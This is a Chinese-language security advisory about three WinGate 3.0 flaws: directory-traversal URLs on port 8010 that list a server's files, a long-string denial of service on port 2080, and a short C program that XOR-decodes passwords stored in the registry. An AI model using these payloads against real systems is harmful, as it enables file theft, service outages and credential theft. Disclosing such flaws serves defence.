受影响的系统:WinGate3.0 -Win9X  -WinNT
不受影响的版本: 未知 

远程: YES / 本地:YES
内容摘要:
作为共享internet线路的好工具,wingate的在线用户达2%以上,总用户占proxy service类软件的比例只怕有30% 以上,但是WinGate 3.0 有3个毛病.令入侵者可以远程侵入WinGate Server的硬盘.

漏洞的利用:  

1,远程用户可以窃取文件

毛病是wingate的Log file service引起的,默认情况下,所有的wingate service是设置为仅127.0.0.1这样的本机用户才能访问的,但是log file service是让用户可以远程浏览的,所以....

在以前的版本就有这个毛病,现在又有不同的形式: 假设对方运行wingate3.0,其host为 www.server.com,则可以用浏览器输入下列字串:

1、http://www.server.com:8010/c:/ - NT/Win9x
2、http://www.server.com:8010// - NT/Win9x
3、http://www.server.com:8010/..../ - Win9x


硬盘上每个文件就这样被列了出来 

二,远程攻击

wingate 3.0的winsock重定向是设置在2080端口,当你用telnet之类的程序连接到这个port然后发送2000个字符然后断开, 所有的wingate服务都会完蛋 
三.本地用户可以窃取密码.

wingate放密码的注册表的键值是不安全的,任何本地用户都可以解密,这个密码也许和root密码是同一个....

编译下面这段代码:

#include "stdafx.h"

#include 
#include 
main(int argc, char *argv[]) {

char i;
for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;
}


解决方案:
锁定所有服务,只允许127.0.0.1 loopback才能访问这些services 另外两个没有办法 :(